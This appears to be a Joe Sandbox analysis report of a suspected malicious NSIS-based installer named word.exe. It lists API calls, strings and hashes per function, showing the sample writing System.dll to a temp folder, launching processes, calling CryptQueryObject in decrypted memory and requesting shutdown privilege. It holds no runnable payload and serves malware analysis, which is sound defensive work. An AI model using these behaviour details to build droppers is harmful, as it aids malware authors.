Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: b9521f7bc1000ed8736d0cfea6427d8fadcdebcb8218d11fad191aaefdea5298
Instruction ID: ec77af8a3f3e327efabc47ec9ad7f814260ebf35776ba6c608f1767ad00b0db6
Opcode Fuzzy Hash: b9521f7bc1000ed8736d0cfea6427d8fadcdebcb8218d11fad191aaefdea5298
Instruction Fuzzy Hash: CBF06253904F506BFB3272351C44B7B5B88CB55355F18C87BEE50A62C2827C48614F9A

Function 00404F50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404F7F
CallWindowProcA.USER32(?,?,?,?), ref: 00404FD0

Part of subcall function 00404038: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040404A

Strings

, xrefs: 00404F60

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
Instruction ID: e4ca6dfb8be9ac33f077af52de3e350fef620c5d1e65b576c63f1805fc4ef9c4
Opcode Fuzzy Hash: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
Instruction Fuzzy Hash: 1801D4B160420AAFDF209F50DD80A9B3B66FBC0315F144137FB00B52D1D7398C51A669

Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E

Strings

C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll, xrefs: 004024DD, 00402502

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll
API String ID: 427699356-2192832599
Opcode ID: 55a763082a11604e42dd3a7e23fb23cc49d380056e752e231f9721a2dfb866ba
Instruction ID: 15837e18a0899aebe372c1c9672940312f560d5d25332acc002067b6f94eb92f
Opcode Fuzzy Hash: 55a763082a11604e42dd3a7e23fb23cc49d380056e752e231f9721a2dfb866ba
Instruction Fuzzy Hash: 78F089B2A54244BFDB40EBB09E499EB76A4DB50305F14443FF141F61C2D6FC4941A76E

Function 004054A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421500,Error launching installer), ref: 004054C9
CloseHandle.KERNEL32(?), ref: 004054D6

Strings

Error launching installer, xrefs: 004054B7

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
Instruction ID: 1668edf84edc795d90e5179e363d58f44986d7750dcb732495ea53e78f2e035e
Opcode Fuzzy Hash: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
Instruction Fuzzy Hash: 8AE0E674A00209BBDB109FA4DD05A6B77BCEB14345B508561B911E2160E774D9548A79

Function 004036F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77582EE0,004036C9,77583410,004034D6,?), ref: 0040370C
GlobalFree.KERNEL32(0051DEC0), ref: 00403713

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403704

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
Instruction ID: 0fe4964e98027e88380181352afc78dea88c0f551701ba437740c6db36bc47f5
Opcode Fuzzy Hash: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
Instruction Fuzzy Hash: 0EE0EC7390512097C6215F96AD04B5ABB686B89B62F06842AED407B3A18B746C418BD9

Function 004057C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\word.exe,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 004057CE
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\word.exe,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 004057DC

Strings

C:\Users\user\Desktop, xrefs: 004057C8

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction ID: f40007591d3941cd74726badf399ab62381001b9e0dca56ace991d14a2ccaf85
Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction Fuzzy Hash: 4BD0A7B280CD705FF30352109C04B8F6A48CF16310F094063E040A71D0C2781C414BFD

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_word.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24

Function 004058E7 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
lstrcmpiA.KERNEL32(00405B16,00000000), ref: 0040590F
CharNextA.USER32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405920
lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
Instruction ID: 42f6177a7bbf9ad164fe3de6883cfd7493767cce72774148ee1a9d65a6b1b045
Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
Instruction Fuzzy Hash: 87F06236604558FFC7129FA5DD4099EBBA8EF16360B2540A9E800F7260D674EE01ABA9

Analysis Process: word.exePID: 8792, Parent PID: 9140COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00151B77 Relevance: 1.7, APIs: 1, Instructions: 151
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptQueryObject.CRYPT32(?,?,?,?,?,?,?,?,?,?,?), ref: 00151C76

Memory Dump Source

Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_150000_word.jbxd

Similarity

API ID: CryptObjectQuery
String ID:
API String ID: 1409351862-0
Opcode ID: 18ab6fac01e55d3aa2e6f0df04e4f90d22596fdcaa829ff7aedf585494e1e694
Instruction ID: 1c7fca796ac300a65624fea55532a5bb01ac037f2ee04ee8f9994f900423978d
Opcode Fuzzy Hash: 18ab6fac01e55d3aa2e6f0df04e4f90d22596fdcaa829ff7aedf585494e1e694
Instruction Fuzzy Hash: 74517AB9D042589FDF11CFA9D984AEEFBB1AB19310F24A02AE814B7210D335A955CF58

Function 00151B78 Relevance: 1.6, APIs: 1, Instructions: 150
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptQueryObject.CRYPT32(?,?,?,?,?,?,?,?,?,?,?), ref: 00151C76

Memory Dump Source

Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_150000_word.jbxd

Similarity

API ID: CryptObjectQuery
String ID:
API String ID: 1409351862-0
Opcode ID: d255db5817b911659d8f4c1a5c41dc295bc77b0616c36ecca86cf94c609620cd
Instruction ID: 1d60c960c04d8936f191def421776130bc991f9678377dc2afc5be85a45c4824
Opcode Fuzzy Hash: d255db5817b911659d8f4c1a5c41dc295bc77b0616c36ecca86cf94c609620cd
Instruction Fuzzy Hash: 16517AB9D042589FDF11CFA9D984ADEFBB1AB19310F24A02AE814B7210D335A955CF58

Function 0015B43C Relevance: .7, Instructions: 744
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_150000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b4d9a9f88d5075a20ce2a2c5b7e3c71bb8a0df8cd234eaba52250b2afc8449
Instruction ID: dd33f4bdd56e298adb6a04abed14a656bbd0e6edb1655336f91188b2715f5373
Opcode Fuzzy Hash: 10b4d9a9f88d5075a20ce2a2c5b7e3c71bb8a0df8cd234eaba52250b2afc8449
Instruction Fuzzy Hash: 4872D834A01228CFDB14DFA8C894BEDBBB2BF49309F1454A9E819AB351DB359D85CF44

Function 000AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5951891471.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_ad000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12e8fb07a9a3bf916523515fcaad3428a5795669aa3c2fec99cc6325001d9fc5
Instruction ID: 8a6fe4552c806ff87b1f0100f471130af843efca86f8a8b735de7c9f4d55f182
Opcode Fuzzy Hash: 12e8fb07a9a3bf916523515fcaad3428a5795669aa3c2fec99cc6325001d9fc5
Instruction Fuzzy Hash: 3221F271604340EFDB24DF64D9C0F16BBA1EB89314F34C96AD84A4FA46C73AD847CA62

Function 000AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5951891471.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_ad000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d6e41dc7c18da6184b83d27161a14c57735bd0c63291f7f16d6b660c39bf07
Instruction ID: 96cf120caf3cf182070f67fa558fa2ac77250b08fdaf796a37ad93a656690996
Opcode Fuzzy Hash: 63d6e41dc7c18da6184b83d27161a14c57735bd0c63291f7f16d6b660c39bf07
Instruction Fuzzy Hash: 44210471604300EFEB55DF94D9C0B2ABBA1FB95314F34C56ED84A4BA42C73AD846CB62

Non-executed Functions

Function 00403217 Relevance: 66.8, APIs: 27, Strings: 11, Instructions: 337stringfilecomCOMMON

Download Yara Rule

APIs

#17.COMCTL32 ref: 00403238
SetErrorMode.KERNEL32(00008001), ref: 00403243
OleInitialize.OLE32(00000000), ref: 0040324A

Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
Part of subcall function 0040601C: LoadLibraryA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406039
Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,?,00000000,00000009), ref: 00403272

Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE

GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 0040329A
CharNextA.USER32(00000000,00429000,00000020), ref: 004032C5
GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 004033C2
GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 004033D3
lstrcatA.KERNEL32(0042A400,\Temp), ref: 004033DF
GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 004033F3
lstrcatA.KERNEL32(0042A400,Low), ref: 004033FB
SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 0040340C
SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 00403414
DeleteFileA.KERNEL32(0042A000), ref: 00403428
OleUninitialize.OLE32(?), ref: 004034D6
ExitProcess.KERNEL32 ref: 004034F6
lstrcatA.KERNEL32(0042A400,~nsu.tmp,00429000,00000000,?), ref: 00403502
lstrcmpiA.KERNEL32(0042A400,00429C00), ref: 0040350E
CreateDirectoryA.KERNEL32(0042A400,00000000), ref: 0040351A
SetCurrentDirectoryA.KERNEL32(0042A400), ref: 00403521
DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,00424000,?), ref: 0040357A
CopyFileA.KERNEL32(0042AC00,0041E8B8,00000001), ref: 0040358E
CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
GetCurrentProcess.KERNEL32(?,?,00000006,00000005,?), ref: 00403614
ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
ExitProcess.KERNEL32 ref: 0040368F

Strings

`KYw, xrefs: 00403400
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403227
Error launching installer, xrefs: 0040348E
~nsu.tmp, xrefs: 004034FC
\Temp, xrefs: 004033D9
NSIS Error, xrefs: 00403278
TEMP, xrefs: 00403407
TMP, xrefs: 0040340F
SeShutdownPrivilege, xrefs: 00403626
Low, xrefs: 004033F5
", xrefs: 004032EA

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$`KYw$~nsu.tmp
API String ID: 4107622049-1333629530
Opcode ID: de19fc6eb43a7d3fd348213b3199de702639297796c08e6194a8a61e32d4d2c8
Instruction ID: a1c447b546bb562fff2a187ff51308e62fc677b1bbcaaf8e03341a31a96d3340
Opcode Fuzzy Hash: de19fc6eb43a7d3fd348213b3199de702639297796c08e6194a8a61e32d4d2c8
Instruction Fuzzy Hash: DFB1F570608351BAE7216F619C8DA2B3EA89B45706F04443FF541BA2D2C77C9E01CB6E

Function 00404959 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404971
GetDlgItem.USER32(?,00000408), ref: 0040497C
GlobalAlloc.KERNEL32(?,?), ref: 004049C6
LoadBitmapA.USER32(0000006E), ref: 004049D9
SetWindowLongA.USER32(?,?,00404F50), ref: 004049F2
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404A06
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A18
SendMessageA.USER32(?,00001109,00000002), ref: 00404A2E
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A3A
SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404A4C
DeleteObject.GDI32(00000000), ref: 00404A4F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A7A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A86
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B1B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B46
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5A
GetWindowLongA.USER32(?,?), ref: 00404B89
SetWindowLongA.USER32(?,?,00000000), ref: 00404B97
ShowWindow.USER32(?,00000005), ref: 00404BA8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CA5
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D0A
SendMessageA.USER32(?,?,00000000,00000000), ref: 00404D1F
SendMessageA.USER32(?,00000420,00000000,?), ref: 00404D43
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D63
ImageList_Destroy.COMCTL32(?), ref: 00404D78
GlobalFree.KERNEL32(?), ref: 00404D88
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E01
SendMessageA.USER32(?,00001102,?,?), ref: 00404EAA
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EB9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404ED9
ShowWindow.USER32(?,00000000), ref: 00404F27
GetDlgItem.USER32(?,000003FE), ref: 00404F32
ShowWindow.USER32(00000000), ref: 00404F39

Strings

, xrefs: 00404F11
N, xrefs: 00404BE3
M, xrefs: 00404B02

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: cd2996e30e9c20533b75e243f2167e3a83656f86b4c2f654de93cabef9ea3e18
Instruction ID: 292d5c244ab645820c7f02bed8ff3f2a610eed88cba0887a0da166436049191d
Opcode Fuzzy Hash: cd2996e30e9c20533b75e243f2167e3a83656f86b4c2f654de93cabef9ea3e18
Instruction Fuzzy Hash: A10250B0900209AFEF109F54DC85AAE7BB5FB84315F10817AFA11B62E1D7789E42DF58

Function 004055B1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,0042A400,77582EE0,00000000), ref: 004055DA
lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,0042A400,77582EE0,00000000), ref: 00405622
lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,0042A400,77582EE0,00000000), ref: 00405643
lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,0042A400,77582EE0,00000000), ref: 00405649
FindFirstFileA.KERNEL32(00420D00,?,?,?,00409014,?,00420D00,?,?,0042A400,77582EE0,00000000), ref: 0040565A
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405707
FindClose.KERNEL32(00000000), ref: 00405718

Strings

\*.*, xrefs: 0040561C

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
